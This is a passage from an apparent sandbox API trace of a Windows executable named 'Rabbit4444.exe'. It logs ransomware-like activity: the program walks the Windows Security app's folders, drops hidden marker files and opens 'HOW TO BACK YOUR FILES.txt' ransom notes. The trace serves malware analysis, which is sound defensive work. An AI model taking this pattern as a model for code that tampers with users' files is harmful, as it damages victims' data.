cAlternateFileName="")) returned 1 [0065.385] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.385] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.385] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.385] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.385] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.385] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04b1646, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04b1646, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04b1646, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.385] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04b1646, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04b1646, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04b1646, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.385] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0065.385] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.386] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.386] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.386] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.386] CloseHandle (hObject=0x2cc) returned 1 [0065.386] CloseHandle (hObject=0x2a0) returned 1 [0065.386] GetCurrentThreadId () returned 0xd98 [0065.386] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0065.386] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState" [0065.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11de60 | out: hHeap=0xe0000) returned 1 [0065.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0065.387] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState" [0065.387] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\" [0065.387] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0065.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.387] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.390] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.391] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.391] CloseHandle (hObject=0x2a0) returned 1 [0065.391] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState") returned 93 [0065.391] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.391] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x72644337, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04b1646, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0065.391] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.391] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.392] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.392] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.392] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x72644337, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x72644337, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04b1646, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.392] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.392] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.392] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.392] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.392] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.392] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04b1646, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04b1646, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.392] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.392] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.392] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04b1646, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04b1646, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.392] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0065.392] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.393] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.393] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.393] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.393] CloseHandle (hObject=0x2cc) returned 1 [0065.393] CloseHandle (hObject=0x2a0) returned 1 [0065.393] GetCurrentThreadId () returned 0xd98 [0065.393] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0065.393] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache" [0065.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0065.393] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0065.393] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache" [0065.393] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\" [0065.393] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0065.393] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.394] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.397] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.397] CloseHandle (hObject=0x2a0) returned 1 [0065.398] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache") returned 93 [0065.398] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.398] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0065.398] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.398] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.398] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.398] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.398] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.398] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.398] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.398] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.398] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.398] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.398] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04d6363, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04d6363, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.398] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.399] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.399] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04d6363, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04d6363, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.399] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0065.399] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.399] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.400] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.400] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.400] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.400] CloseHandle (hObject=0x2cc) returned 1 [0065.400] CloseHandle (hObject=0x2a0) returned 1 [0065.400] GetCurrentThreadId () returned 0xd98 [0065.400] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0065.400] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData" [0065.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122780 | out: hHeap=0xe0000) returned 1 [0065.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0065.400] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData" [0065.401] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\" [0065.401] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0065.401] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.sechealthui_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.401] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.404] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.405] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.405] CloseHandle (hObject=0x2a0) returned 1 [0065.407] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData") returned 90 [0065.407] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.407] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0065.408] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.408] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.408] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.408] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.408] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7266a59f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x7266a59f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf04d6363, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.408] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.408] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.408] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.408] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.408] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.408] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04d6363, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04d6363, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04fc5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.408] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.408] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.408] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf04d6363, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf04d6363, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf04fc5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.408] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0065.408] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.408] CreateFileW 